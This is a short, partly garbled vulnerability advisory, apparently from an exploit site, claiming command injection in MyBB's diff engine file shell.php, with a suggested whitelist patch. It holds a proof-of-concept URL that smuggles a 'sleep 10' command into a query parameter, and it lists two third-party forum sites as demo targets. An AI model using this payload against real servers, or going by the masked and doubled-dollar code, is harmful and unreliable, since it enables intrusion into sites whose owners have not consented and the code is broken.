源码下载 : http://www.mybb.com/download/latest


文件: /inc/3rdparty/diff/Diff/Engine/shell.php

Bug 部分源码:
$$fp = fopen($$to_file, ‘w‘);
fwrite($$fp, implode(“\n“, $$to_lines));
fclose($$fp);
$$diff = shell_*($$this->_diff* . ‘ ‘ . $$from_file . ‘ ‘ . $$to_file);
unlink($$from_file);
unlink($$to_file);
证明:

$$_GET + shell_*() = * *ution

缺陷描述:

An attacker might *ute arbitrary system *s with this vulnerability. User tainted data is used when creating the * that will be *uted on the underlying operating system. This vulnerability can lead to full server compromise.

缺陷示例代码:
1: *(“./crypto -mode “ . $$_GET[“mode“]);

proof of concept :

/index.php?mode=1;sleep 10;

补丁:

Limit the code to a very strict character subset or build a whitelist of allowed *s. Do not try to filter for evil *s. Try to avoid the usage of system * *uting functions if possible.

1: $$modes = array(“r“, “w“, “a“); if(!in_array($$_GET[“mode“], $$modes)) exit ;
r

D3m0 :

http://www.minuteworkers.com/forum/inc/3rdparty/diff/Diff/Engine/shell.php?Find It In Source=RCE

http://www.artistsuniverse.org/forum/inc/3rdparty/diff/Diff/Engine/shell.php?Find It In Source=RCE
#########################################################
We are : K0242 | Nafsh | Ehram.shahmohamadi